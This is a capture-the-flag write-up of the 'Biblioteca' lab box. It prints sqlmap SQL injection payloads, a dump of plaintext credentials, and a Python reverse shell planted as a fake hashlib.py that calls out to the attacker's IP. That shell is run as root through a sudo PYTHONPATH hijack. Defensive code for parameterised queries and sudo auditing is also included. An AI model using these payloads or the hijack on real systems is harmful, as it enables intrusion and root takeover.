Biblioteca (SQLI, Python Library Hijacking)
First, we need to enumerate using rustscan.
➜ biblioteca rustscan -a 10.10.92.49 -- -A | tee nmap.log
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.92.49:22
Open 10.10.92.49:8000
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-25 00:26 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating Ping Scan at 00:26
Scanning 10.10.92.49 [2 ports]
Completed Ping Scan at 00:26, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:26
Completed Parallel DNS resolution of 1 host. at 00:26, 0.04s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:26
Scanning 10.10.92.49 [2 ports]
Discovered open port 22/tcp on 10.10.92.49
Discovered open port 8000/tcp on 10.10.92.49
Completed Connect Scan at 00:26, 0.23s elapsed (2 total ports)
Initiating Service scan at 00:26
Scanning 2 services on 10.10.92.49
Completed Service scan at 00:26, 7.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.92.49.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 6.81s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.89s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Nmap scan report for 10.10.92.49
Host is up, received conn-refused (0.22s latency).
Scanned at 2022-05-25 00:26:11 EDT for 15s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 00:0b:f9:bf:1d:49:a6:c3:fa:9c:5e:08:d1:6d:82:02 (RSA)
| 256 a1:0c:8e:5d:f0:7f:a5:32:b2:eb:2f:7a:bf:ed:bf:3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBk6WcGKOLXNfFSm4hmo/IJAB/aFJ8ZihzQUm796VuMqs4aIusn5+Lu0C8pv8XB22fwBS8XuB6l9LjTo10CFmoQ=
| 256 9e:ef:c9:0a:fc:e9:9e:ed:e3:2d:b1:30:b6:5f:d4:0b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBRsjiudT4XOiE2akDRkCkDkhVRMB7oIVMpgkeM63BmO
8000/tcp open http syn-ack Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Login
| http-methods:
|_ Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.93 seconds
Port 8000
I registered a new user and logged in, but nothing stood out. So I captured the login request (username and password) with Burp and saved it to burp.req.
POST /login HTTP/1.1
Host: 10.10.92.49:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://10.10.92.49:8000
Connection: close
Referer: http://10.10.92.49:8000/login
Upgrade-Insecure-Requests: 1
username=admin&password=pass123
Then I point sqlmap at the saved Burp request to enumerate the databases.
➜ biblioteca sqlmap -r burp.req --dbs --batch
___
__H__
___ ___[']_____ ___ ___ {1.6.4#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:31:47 /2022-05-25/
[00:31:47] [INFO] parsing HTTP request from 'burp.req'
[00:31:48] [INFO] testing connection to the target URL
[00:31:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:31:48] [INFO] testing if the target URL content is stable
[00:31:49] [INFO] target URL content is stable
[00:31:49] [INFO] testing if POST parameter 'username' is dynamic
[00:31:49] [WARNING] POST parameter 'username' does not appear to be dynamic
[00:31:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[00:31:49] [INFO] testing for SQL injection on POST parameter 'username'
[00:31:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:31:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:31:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:31:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:31:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[00:31:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:31:58] [INFO] testing 'Generic inline queries'
[00:31:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:31:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[00:32:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[00:32:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:32:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:32:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:32:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:32:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:32:14] [INFO] target URL appears to have 4 columns in query
[00:32:15] [INFO] POST parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3487 FROM (SELECT(SLEEP(5)))hMeX) AND 'rtsC'='rtsC&password=pass123
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a787a71,0x6b4c4973734879506d77556270486e6f486d7248766264434278566247434f515a7463677477536e,0x716a767071),NULL,NULL-- -&password=pass123
---
[00:32:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:32:17] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] website
[00:32:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[00:32:17] [INFO] fetched data logged to text files under '/home/hnl/.local/share/sqlmap/output/10.10.92.49'
[*] ending @ 00:32:17 /2022-05-25/
Next, dump the credentials from the users table of the website database.
➜ biblioteca sqlmap -r burp.req -D website -T users --dump-all
___
__H__
___ ___[(]_____ ___ ___ {1.6.4#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:34:04 /2022-05-25/
[00:34:04] [INFO] parsing HTTP request from 'burp.req'
[00:34:04] [INFO] resuming back-end DBMS 'mysql'
[00:34:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3487 FROM (SELECT(SLEEP(5)))hMeX) AND 'rtsC'='rtsC&password=pass123
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a787a71,0x6b4c4973734879506d77556270486e6f486d7248766264434278566247434f515a7463677477536e,0x716a767071),NULL,NULL-- -&password=pass123
---
[00:34:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:34:04] [INFO] sqlmap will dump entries of all tables from all databases now
[00:34:04] [INFO] fetching tables for database: 'website'
[00:34:04] [INFO] fetching columns for table 'users' in database 'website'
[00:34:05] [INFO] fetching entries for table 'users' in database 'website'
Database: website
Table: users
[2 entries]
+----+-------------------+----------------+----------+
| id | email | password | username |
+----+-------------------+----------------+----------+
| 1 | smokey@email.boop | My_P@ssW0rd123 | smokey |
| 2 | user01@gmail.com | user01 | user01 |
+----+-------------------+----------------+----------+
[00:34:05] [INFO] table 'website.users' dumped to CSV file '/home/hnl/.local/share/sqlmap/output/10.10.92.49/dump/website/users.csv'
[00:34:05] [INFO] fetched data logged to text files under '/home/hnl/.local/share/sqlmap/output/10.10.92.49'
[*] ending @ 00:34:05 /2022-05-25/
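sqlmap showed that the username field of the Werkzeug login is spliced into the SQL query, and the dump shows what that exposes. As an added illustration (my code, not the room's application, which is not on this page), here is the pattern that produces that bug next to the parameterised version, run against a constructed sqlite3 copy of the users table above; the injected value reuses the `-- -` comment terminator from sqlmap's payload to cut off the password check.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the website.users table shown in the
    # dump above; sqlite3 replaces MySQL so the example runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, email TEXT, password TEXT, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "smokey@email.boop", "My_P@ssW0rd123", "smokey"),
        (2, "user01@gmail.com", "user01", "user01"),
    ])
    return db


def login_vulnerable(db, username, password):
    # Request fields are pasted straight into the SQL text, so a quote in the
    # username closes the string literal and the rest of the input becomes SQL.
    # This is the defect sqlmap found in the 'username' POST parameter.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    # Parameterised query: the driver passes the values separately from the
    # statement, so quotes and comment markers in the input stay plain data.
    # (Passwords are still stored in clear text here, as on the box; hashing
    # them is a separate fix.)
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Return (vulnerable_result, safe_result) for one login attempt."""
    db = make_db()
    return login_vulnerable(db, username, password), login_safe(db, username, password)
```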
User
Using smokey's credentials from the dump, I log in over SSH.
➜ ~ ssh smokey@10.10.92.49
The authenticity of host '10.10.92.49 (10.10.92.49)' can't be established.
ED25519 key fingerprint is SHA256:xpqbWswo65YJezxXRx18Va9jub3YGOEzi9N17Mhy9FE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.92.49' (ED25519) to the list of known hosts.
smokey@10.10.92.49's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 25 May 2022 04:36:00 AM UTC
System load: 0.0 Processes: 113
Usage of /: 61.3% of 9.78GB Users logged in: 0
Memory usage: 61% IPv4 address for eth0: 10.10.92.49
Swap usage: 0%
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Dec 7 03:21:42 2021 from 10.0.2.15
smokey@biblioteca:~$
Switch from smokey to the hazel user with the password 'hazel'.
smokey@biblioteca:/home/hazel$ su hazel
Password: hazel
hazel@biblioteca:~$
Checking sudo privileges shows that hazel can run a Python script as root with the SETENV tag, which lets the caller pass environment variables through to the command.
hazel@biblioteca:~$ sudo -l
Matching Defaults entries for hazel on biblioteca:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hazel may run the following commands on biblioteca:
(root) SETENV: NOPASSWD: /usr/bin/python3 /home/hazel/hasher.py
Root
hasher.py imports the hashlib module.
hazel@biblioteca:~$ cat hasher.py
import hashlib
def hashing(passw):
    md5 = hashlib.md5(passw.encode())
    print("Your MD5 hash is: ", end ="")
    print(md5.hexdigest())
    sha256 = hashlib.sha256(passw.encode())
    print("Your SHA256 hash is: ", end ="")
    print(sha256.hexdigest())
    sha1 = hashlib.sha1(passw.encode())
    print("Your SHA1 hash is: ", end ="")
    print(sha1.hexdigest())
def main():
    passw = input("Enter a password to hash: ")
    hashing(passw)
if __name__ == "__main__":
    main()
The real hashlib.py lives in the standard library:
hazel@biblioteca:~$ ls -al /usr/lib/python3.8/hashlib.py
-rw-r--r-- 1 root root 9730 Nov 26 20:14 /usr/lib/python3.8/hashlib.py
Create a new hashlib.py in /tmp that will be imported in place of the real module.
# /tmp/hashlib.py: connects back to the listener and hands it a shell
import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.17.40.142",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
Set PYTHONPATH to /tmp so Python finds this hashlib.py before the standard-library one, then run the script through sudo.
hazel@biblioteca:/tmp$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py
In the netcat listener we get a root reverse shell and can read the root flag.
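The sudo rule above grants SETENV on an interpreter, and that is what makes the PYTHONPATH step work: under env_reset alone sudo would strip PYTHONPATH. As an added example (my code, not from the room), the first function audits `sudo -l` output for that combination, and the second spawns a child interpreter to show that a PYTHONPATH directory lands on sys.path normally but is ignored under `python3 -I`; the sample output is constructed to mirror the page, and its second rule is a hypothetical hardened version without SETENV.

```python
import os
import re
import subprocess
import sys
import tempfile

# Interpreters whose module search path is steered by environment variables
# (PYTHONPATH, PERL5LIB, RUBYLIB, NODE_PATH), so SETENV on them lets the
# caller decide which library code runs as the target user.
ENV_STEERED = {"python", "python2", "python3", "perl", "ruby", "node"}

# Shape of a command line in `sudo -l` output: "(runas) TAG: TAG: command args"
ENTRY = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:!?[A-Z]+:\s*)*)(?P<cmd>.+)$")


def risky_sudo_entries(sudo_l_output):
    """Return (runas, command) pairs where SETENV is granted on an interpreter."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        binary = os.path.basename(m.group("cmd").split()[0])
        if "SETENV" in tags and binary in ENV_STEERED:
            hits.append((m.group("runas"), m.group("cmd")))
    return hits


DEMO_DIR = tempfile.gettempdir()  # stands in for the /tmp used on the box


def pythonpath_is_searched(module_dir, isolated):
    """Run a child interpreter with PYTHONPATH=module_dir and report whether
    that directory made it onto sys.path. With -I (isolated mode) PYTHONPATH
    is ignored, so a hashlib.py planted there would no longer be imported."""
    probe = ("import os, sys; print(int(any(os.path.realpath(p) == %r "
             "for p in sys.path if p)))" % os.path.realpath(module_dir))
    cmd = [sys.executable] + (["-I"] if isolated else []) + ["-c", probe]
    result = subprocess.run(cmd, env={**os.environ, "PYTHONPATH": module_dir},
                            capture_output=True, text=True, check=True)
    return result.stdout.strip() == "1"


# Constructed sample mirroring the `sudo -l` output shown above.
SUDO_L_SAMPLE = """\
Matching Defaults entries for hazel on biblioteca:
    env_reset, mail_badpass
User hazel may run the following commands on biblioteca:
    (root) SETENV: NOPASSWD: /usr/bin/python3 /home/hazel/hasher.py
    (root) NOPASSWD: /usr/bin/python3 -I /home/hazel/hasher.py
"""
```

The fix is to drop SETENV from the rule; adding `-I` to the interpreter command is a second layer that also defends against a writable script directory being prepended to sys.path.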